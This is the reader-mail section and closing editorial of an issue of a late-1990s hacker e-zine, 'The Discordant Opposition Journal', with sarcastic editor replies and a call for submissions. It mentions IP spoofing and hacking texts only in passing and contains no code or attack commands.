::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
From: Cigarjosey@aol.com
Subject: better reception
dear cronus
I am a farmer and i love your articles in 411.i have an ericson
kh668 and i wanted to hook up a external antenaa to my 80 foot
silo. Radio shack has a filter for the phones frequencies but they
dont have the tnc connecter. Ericsdonn wants a arm and a leg for
their travel hook up. Can u help?
thanks cigarjosey
:Cigarjosey, if that is your REAL name. I am not sure I know what
you are asking. Prehaps if you asked a question like 'Can you get
me this thing ?' or 'Where should I go to buy it ?'. Until you
phrase your mails according to the dictates of Modern English I
will have to simply ignore you.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
From: "Ben Winston" <ben@thewinstons48.freeserve.co.uk>
Subject: I'm not so sure I wanna Help You Discordants
Very, very cool site.
:Hmm, yes. Nice and to the point.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
From: "DynamikHack" <dynamikhack@geocities.com>
Subject: Wingating the Net
I read your article about using IP spoofing through Wingate
systems. At the end of it, it said that files such as an IP
scanner are available on your site. However, I can't seem to
find them. Can you provide me with a link to somewhere that
I can get an IP scanner?
thanks
:Try www.warforge.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
From: "Kirby L. Wallace" <kirby@wallaceinfo.com>
Subject: oh yeah, one other thing...
It's nice to find others who are interested in learning for the
sake of learning, not for the sake of playing one-ups-manship with
destructive behaviours that only prove what a moron one is. Good
for you.
Kirby
:Thanks for the support Kirb. You will not be forgotten when the
revolution comes...
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Thanks about it for this issue. But keep those ridiculous questions
coming cause the next issue will award a special prize to the most
stupid mail we receive.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 10:::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Conclusion:
Well there you all are for another issue. Hope it keep you as
enthralled as previously. We try to keep up the usual degree of
crap each issue. We are sure you lot have complaints so send
them to discordia@Rue-the-Day.net and we'll probably ignore you.
We have some complaints of our own. We started this Zine out
of boredom and it seems that no-one is interested. Sure, we get
loads of hits on the site. Loads of people download the Zine
but apart from abuse. Rarely do we get a serious contributor.
We need, I repeat WE NEED, submissions of stories, how-to's, art,
poems, quotes, technical FAQ's, hacking texts, underground exploits
and anything else you have lying around. Unlike the swanky print
publications that you actually have to PAY for... the DoJ is free
and we need your help to keep it up. Cronus and Rue do not intend
to write anything for the next issue. We want your help in filling
the space.
Much thanks go out to Kleptic and Digital Avatar for both their
continued support. Thank You Guys. Ethercat has always been willing
to help and much thanks go out to her for putting up with all our
wild ideas... rOTTEN was the Original ASCII artist and for this
issue we decided we needed a change. The new art is done by an
anonymous author, but thanks go out to carsten_bund@mediacube.de.
Also we recently got our first contribution of Digital Art to the
Gallery section of the site, thanks go out to Michael Perryman.
Kleptic has his now regular column 'Ask Dr. Klep' and we thought
the name would be enough to inspire questions but obviously not.
Kleptic, Klep to his friends, is a very well rounded underground
figure and is willing to answer all your questions, even the ones
your parents would never answer growing up. So mail him your deep
underground questions and he'll sort you with an answer...
So till next time Folks. Same Discordant Time, Same Discordant
Channel.
'Be Safe, don't get caught with your pants down...'
- President William Clinton.
The Editors.